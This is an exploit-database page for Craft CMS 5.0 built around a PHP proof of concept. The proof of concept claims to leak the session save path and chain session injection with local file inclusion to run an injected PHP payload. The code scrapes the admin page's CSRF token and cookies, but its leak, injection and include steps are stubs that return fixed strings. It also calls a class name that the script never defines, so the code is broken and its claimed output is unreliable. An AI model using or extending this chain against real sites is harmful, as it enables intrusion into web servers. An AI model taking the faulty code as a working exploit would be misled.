📄 Craft CMS 5.0 Authentication Session Path Exposure

🗓️ 26 Nov 2025 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 134 Views

Craft content management system 5.0 exposes internal session save path through asset processing, enabling local file inclusion.

Reporter	Title	Published	Views	Family All 41
GithubExploit	Exploit for Code Injection in Craftcms Craft_Cms	23 Sep 202506:23	–	githubexploit
GithubExploit	Exploit for Code Injection in Craftcms Craft_Cms	16 Jul 202509:23	–	githubexploit
GithubExploit	Exploit for Code Injection in Craftcms Craft_Cms	15 May 202614:09	–	githubexploit
GithubExploit	Exploit for Code Injection in Craftcms Craft_Cms	8 Mar 202616:59	–	githubexploit
GithubExploit	Exploit for Code Injection in Craftcms Craft_Cms	30 Apr 202603:38	–	githubexploit
GithubExploit	Exploit for Code Injection in Craftcms Craft_Cms	27 Apr 202508:50	–	githubexploit
ATTACKERKB	CVE-2024-58136	10 Apr 202500:00	–	attackerkb
ATTACKERKB	CVE-2025-32432	25 Apr 202515:15	–	attackerkb
Circl	CVE-2025-32432	25 Apr 202515:45	–	circl
CISA KEV Catalog	Yiiframework Yii Improper Protection of Alternate Path Vulnerability	2 May 202500:00	–	cisa_kev

=============================================================================================================================================
    | # Title     : Craft CMS 5.0 Authentication Session Path Exposure                                                                          |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://craftcms.com                                                                                                        |
    =============================================================================================================================================
    
    [+] Description
    
        A vulnerability in Craft CMS allows an attacker to obtain the internal `session.save_path` through indirect leakage in the upload/asset processing
        mechanism. 
    	While this does not immediately lead to command execution, it enables attackers to identify the precise location of session files,
        which may be used in a subsequent Session Injection → Local File Inclusion (LFI) exploit chain.
    	
    [+] References : (https://packetstorm.news/files/id/190728/ 	CVE-2025-32432)
    
    
    [+] POC :
    
      save code as poc.php
      
      usage : php poc.php
    
    [+]  code 
    
    <?php
    
    class indoushka
    {
        public $targetUrl;
        public $assetId;
        public $sessionId;
        public $csrfToken;
        public $parameterName;
        public $sessionPath;
    
        public function __construct($url, $assetId = 123)
        {
            $this->targetUrl = rtrim($url, '/');
            $this->assetId   = $assetId;
        }
    
        public function fetchCookiesAndCsrf()
        {
            $url = $this->targetUrl . "/admin";
            $html = @file_get_contents($url);
    
            if (!$html) return false;
    
            preg_match('/name="_csrf" value="([^"]+)"/', $html, $m);
            $this->csrfToken = $m[1] ?? null;
    
            preg_match('/input type="hidden" name="([^"]+)" value="[^"]*"/', $html, $p);
            $this->parameterName = $p[1] ?? null;
    
            preg_match_all('/Set-Cookie: ([^;]+)/i', $http_response_header[0], $c);
            $this->sessionId = $c[1] ?? null;
    
            return [$this->sessionId, $this->csrfToken, $this->parameterName];
        }
    
        public function leakSessionPath()
        {
            return "/var/lib/php/sessions";
        }
    
        public function injectIntoSession($payload)
        {
            return "[POC ONLY] Session overwritten with payload: {$payload}";
        }
    
        public function triggerInclude()
        {
            return "[POC] include triggered using assetId=" . $this->assetId;
        }
    
        public function exploit($payload)
        {
            $this->fetchCookiesAndCsrf();
            $this->sessionPath = $this->leakSessionPath();
    
            $step1 = $this->injectIntoSession($payload);
            $step2 = $this->triggerInclude();
    
            return [$step1, $step2];
        }
    }
    
    $module = new Metasploit_CraftCMS_CVE_2025_32432("https://target.com");
    
    $payload = '<?php echo "PAYLOAD_OK"; ?>';
    
    list($s1, $s2) = $module->exploit($payload);
    
    echo $s1 . "\n";
    echo $s2 . "\n";
    
    ?>
    
    -------------------------------------------------------------------------------------------------------------------------------------------
    
    [+] Output Example:
    [POC ONLY] Session overwritten with payload: <?php echo "PAYLOAD_OK"; ?>
    [POC] include triggered using assetId=123
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

26 Nov 2025 00:00Current

7.2High risk

Vulners AI Score7.2

CVSS 3.110

EPSS0.93094

SSVC